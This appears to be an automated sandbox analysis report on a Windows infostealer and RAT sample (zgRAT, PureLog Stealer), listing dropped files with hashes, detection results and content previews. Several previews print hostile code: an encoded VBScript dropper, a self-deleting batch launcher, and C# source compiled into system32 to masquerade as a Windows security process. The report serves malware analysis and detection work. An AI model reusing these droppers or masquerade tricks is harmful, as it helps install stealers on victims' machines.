                                                                                                                                                                                                                                                                                    Preview:UoqWQ87zWAxhNc1LFDjMROX9oFioUhykJ38Lq6d7xQt2kK5PLrYTuUgFQrrKaSfzMNXUdqeIjlZAffZdJSdmJf0yX249PSgev4qWwlveMPtI5fkvRNBIz2qqXi6kvf3QF4PkyCrig8Z3wr32SJrBRYo3O99NoKtrVcDBQA6Ogdl1cw4ppESmx29qPWWzDd3WPshTo2lSMceyxxabETij1G4ddWv4nHLDjPmuOlAxdAaUXK2c55uu4TeIxE0SGroERbOiLqNdTvG1pjGSeT8sXbIQud6KusqvVWC55UQPrRaJMmcO7ixws6r0S8xruCskEUfTgKWKCtAGA9DIBrMM44DZpMn7gjfpi0F1HJrwLnu85l0S4pqCzfpKRGoUhZndOVhJ4MB19aBQKEdEVUC13czDK5kAeXPwAQukDqYsoyCZeZANmk8MWvkvfd99lAWmKOQ3T2Ap6TNEaZiv4WY4ZDZOq8EjrZGobZPPIG3ujTPCifVG5OEPlbNGyBMVxa7hNinAJSmydoVFxXpLn8ocV1C9MIaH4h6JVsz92U6mlQv7GHSbVBrzveMVgnxB2e35rMuFhpTSBC0EFE2Fz9v30GX0gddOg5uHW0P4WN3psZytoHQcusL2tAFly4iDMEvGRtsPy8smFGKaSnMZNBeyu1XVvoFco0donsb4YAnw9ixn0oTLrJ0Lj7VaWXdK2P7PngxkLSAMXsyLEufGV4uf9REpWBiBgd3tliAT1s9ZInx1IJWl1Xy8fcPVcHNKt9p4yEkfuMPm4VWWeMgMp6JJo4OJSo0
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):229
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.838240404374592
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
                                                                                                                                                                                                                                                                                    MD5:569A28CF34F3A51DB0CC4AA0369773EC
                                                                                                                                                                                                                                                                                    SHA1:23488377EA3A37B61750952D541B867AB3D8B424
                                                                                                                                                                                                                                                                                    SHA-256:86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
                                                                                                                                                                                                                                                                                    SHA-512:3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):70
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.968079981014333
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
                                                                                                                                                                                                                                                                                    MD5:68B1414DBD5A51F2F75912513D1A035E
                                                                                                                                                                                                                                                                                    SHA1:A45E03F8EDADA7FDF3697EAA6D88785CD464D373
                                                                                                                                                                                                                                                                                    SHA-256:48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
                                                                                                                                                                                                                                                                                    SHA-512:AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1963008
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.552676792704024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                                                                                                    MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                                                                                                    SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                                                                                                    SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                                                                                                    SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.7795471650209909
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:EMFyPttZY9Wr5n6OsFY4hqQFYS7qFf1QXIDcQRc6rcElcw3wIh+HbHg/rZHLnxZD:dmfftn6OBto0/vP6jldzuiFsZ24lO8B
                                                                                                                                                                                                                                                                                    MD5:E44078C1B8398FA98985C39907BEB238
                                                                                                                                                                                                                                                                                    SHA1:F71ADB758331F81DBDC5B83E51362212077FED04
                                                                                                                                                                                                                                                                                    SHA-256:53EC1D2498433415D9AC05E3B95498259D910025C7EE35DC287CAC04B3D22F90
                                                                                                                                                                                                                                                                                    SHA-512:ABF4DF917100844143C74A2791536D8F966B9408171A5080DBEBD3A43C41E9F6956EEEE6FBBE58BCCC16349BECFE322CF7B5F28077916E11C8FD5FEBD3B9254E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.1.8.6.8.1.4.1.8.1.6.1.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.1.8.6.8.1.6.4.6.2.8.7.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.2.b.d.f.a.d.-.4.e.5.a.-.4.0.b.c.-.8.0.f.d.-.2.f.1.9.c.1.f.c.3.e.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.5.c.6.5.8.b.-.d.4.4.1.-.4.d.1.6.-.8.9.f.4.-.0.2.c.3.2.9.2.0.9.6.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.m.x.y.v.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.2.4.-.0.0.0.1.-.0.0.1.3.-.e.d.4.0.-.b.1.9.b.5.4.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.7.5.0.1.3.2.2.f.2.9.b.f.3.a.3.f.a.4.8.a.f.5.e.5.7.b.9.5.a.f.0.0.0.0.f.f.f.f.!.0.0.0.0.c.0.2.e.4.2.8.9.2.4.7.0.1.2.4.6.0.1.b.5.b.1.1.2.6.b.2.c.7.8.0.b.b.0.f.2.c.5.0.2.!.i.m.x.y.v.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.4.:.1.3.:.5.7.:.4.
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Sep 30 16:20:14 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):84226
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.436799880577812
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:UhHFrlWw1ObJMystIhBYa2Dufe39EsVm08:EFpibJHs3a2Dufe39EsVo
                                                                                                                                                                                                                                                                                    MD5:1C50AD63C8A6A41FCFD36F24F9B8EA17
                                                                                                                                                                                                                                                                                    SHA1:930261C9CD70F739B73864BEA786B3E7B2DE7339
                                                                                                                                                                                                                                                                                    SHA-256:DBD41FC77B1FBA6BD5DA39510C7C267472C2BFA014EE15A2FEF5666F49C4A0B6
                                                                                                                                                                                                                                                                                    SHA-512:3D0B2108D96390D552279913EFB3FD5BB881308A042F2F546ACFFF1D51475B7979C951396F91941E31AC9ABC4C34A48EAC28FAC899FA0750412711340B617A9F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MDMP..a..... ..........f....................................$................+..........`.......8...........T...........8....9......................................................................................................eJ......L.......Lw......................T.......$......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8482
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6960851148268703
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJ1jRPly6Y+6q7gmfcSpDT89b1/lkf3lnm:R6lXJJRPly6YW7gmfcT1Ofo
                                                                                                                                                                                                                                                                                    MD5:3C33A0EA8691BD1E0B16382BB21C405C
                                                                                                                                                                                                                                                                                    SHA1:5AAAF46D32D322F092DEC8973A2B2641CF51F7AF
                                                                                                                                                                                                                                                                                    SHA-256:4ECF6E056EFFBB0A90F301E14A90B68CECF498B095EFC2A702B83B424F18DC18
                                                                                                                                                                                                                                                                                    SHA-512:E20F0B8547C26B2F8403224C7735904089CFE454F444877214BD6BFBEA6D8CE3392F78D146C8721A273AFB3978D3CB68421DE851EFAC34C8ED8198302208E6FD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.8.4.<./.P.i.
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4609
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.432723489149381
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsBJg771I9s/WpW8VYOYm8M4JoBFFVyq85Z8HzwVbd:uIjfTI7vu7VaJe/HsVbd
                                                                                                                                                                                                                                                                                    MD5:6FECFDE7D2C5BF4F3CED0F9515A7E61B
                                                                                                                                                                                                                                                                                    SHA1:CE28B2F543D79E49D70FEF56F82EAF883D54BB8F
                                                                                                                                                                                                                                                                                    SHA-256:2CA4EF7B5C45881A8F9E87A5C8A2F71C2B05F5BFBE9F0D674964DF1C5A659FAD
                                                                                                                                                                                                                                                                                    SHA-512:DCBCE84228B5953E3660019982815E225F1D55A255BCE680AB1705E67418FE7531DF2284D8B65E62A88585BB5F6E53DDE4F6D8229EF1EB8FA0D3C4D8761E2B72
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="523162" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1396
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.350961817021757
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                                                                                                                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                                                                                                                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                                                                                                                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                                                                                                                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                                                                    MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                                                                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                                                                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                                                                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\rtcore64.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                                                                    MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                                                                    SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                                                                    SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                                                                    SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):167
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1047258105293825
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1MERE2J5SMoF0CHovBktKcKZG1MERE2J5xAINhHKn:hCRLuVFOOr+DE1Fi23SMHBvKOZG1Fi2y
                                                                                                                                                                                                                                                                                    MD5:5821B47AC09B53F2B781FCC638830A98
                                                                                                                                                                                                                                                                                    SHA1:02B5D8E1C4D7326091D3F2EEB4744F8A12F3F2A6
                                                                                                                                                                                                                                                                                    SHA-256:B9DF6B5491194A5ADAAD3CB49CED63C21359FD3C8767EA359404F8A5D93C35F5
                                                                                                                                                                                                                                                                                    SHA-512:21E33346596CB34DAFB4A224DB10876A5F5B896C82832283DB365BCFDB8CAEEB5853A7A6BC1D62A81637CB372C642EBC3DB3251AD540E35938F78A89E2BFC947
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\winlogon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\LZthEGCsKS.bat"
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):387
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947738884355415
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLYZvlaiFkD:JNVQIbSfhV7TiFkMSfh0vl7FkD
                                                                                                                                                                                                                                                                                    MD5:9FC95E52875036B80748A0672F987B36
                                                                                                                                                                                                                                                                                    SHA1:5019FCFD3150060F4210F756B04BBBD14F8832D5
                                                                                                                                                                                                                                                                                    SHA-256:EF397C42C88516DC5492B22E4C514E2F30664CFB6E45F2F6BB0CBF8A09588872
                                                                                                                                                                                                                                                                                    SHA-512:3C2324B1E008D110CC7BA1B18215315F799C616476043BEB188913704564B41DF4D3DF69EBCEBF90C09F85857CC85DEA3F91D5A54A69A592D460E568C3B359AD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\winlogon.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):249
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1034088951181795
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oFi23fYY52Xi5tn:Hu7L//TRq79cQjZp2X0t
                                                                                                                                                                                                                                                                                    MD5:4D5E30524337F81094409F935FE7AADE
                                                                                                                                                                                                                                                                                    SHA1:51198FFA95D0CE622813A428F5F32D8E4F0B09C4
                                                                                                                                                                                                                                                                                    SHA-256:20CAD606A68EED0B69B5A4184AA858B28F142CB54CA3091B4C44C101CEE73DCB
                                                                                                                                                                                                                                                                                    SHA-512:8765D0228FE01C3B9D9AA721E95FF8B5CF128FB07AA5C4FF31959729043891652C0F597C501CB01EFA1E1BEC7C15CC2BA00D4EB743E68B20743A2A6BB402758D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.0.cs"
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (313), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):734
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262028468394333
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:apI/u7L//TRq79cQjZp2X0oKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79t9pNoKax5DqBVKVrdFAMb
                                                                                                                                                                                                                                                                                    MD5:0B119182273F9FEC876E5BDBC9F18831
                                                                                                                                                                                                                                                                                    SHA1:238E948EE0EB949578F19BA4C44D9C7E52D6A168
                                                                                                                                                                                                                                                                                    SHA-256:83F65A75F30667D75EB748744CF82E41180258D31C4CAEB40C7625C91EA34EF2
                                                                                                                                                                                                                                                                                    SHA-512:CB1B4D7B6B6E199F9A4F5AA765EAB4667271B1E2B53E2F2E07AC3CE1F1255601B27566B2F109586217F7CDFCDA67CB4D1FDA8A1F184269EFABF5BCC516A72569
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
